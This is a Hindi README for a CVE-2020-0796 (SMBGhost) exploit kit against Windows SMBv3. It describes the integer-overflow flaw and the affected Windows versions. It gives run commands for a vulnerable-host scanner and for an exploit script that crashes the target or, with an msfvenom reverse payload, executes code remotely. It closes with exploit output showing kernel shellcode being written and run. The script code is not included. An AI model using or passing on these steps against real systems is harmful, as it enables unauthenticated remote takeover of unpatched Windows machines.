
cve-2020-0796 शोषण उपकरण सेट
CVE-2020-0796 SMBv3 प्रोटोकॉल में दुर्भावनापूर्ण संपीड़ित पैकेटों को संसाधित करते समय हुई त्रुटि के कारण होता है; पैकेट को डीकंप्रेस करते समय, क्लाइंट द्वारा भेजी गई लंबाई का उपयोग किया जाता है, लेकिन यह जाँच नहीं की जाती कि लंबाई वैध है या नहीं, जिसके परिणामस्वरूप पूर्णांक अतिप्रवाह होता है। यह दूरस्थ, अप्रमाणित हमलावर को लक्ष्य प्रणाली पर मनमाना कोड निष्पादित करने की अनुमति देता है। यह भेद्यता EternalBlue (MS17-010) के समान है।
प्रभावित संस्करण: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py CVE-2020-0796 भेद्यता वाले होस्ट को स्कैन करने और खोजने के लिए प्रारूप: python scanner.py ip उदाहरण: python scanner.py 192.168.1.2
exploit.py भेद्यता वाले लक्ष्य होस्ट पर हमला करता है, डिफ़ॉल्ट PoC ब्लू स्क्रीन उत्पन्न करता है, msfvenom के साथ रिवर्स PoC उत्पन्न करने की आवश्यकता है। प्रारूप: python exploit.py -ip ip उदाहरण: python exploit.py -ip 192.168.1.2
आउटपुट: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...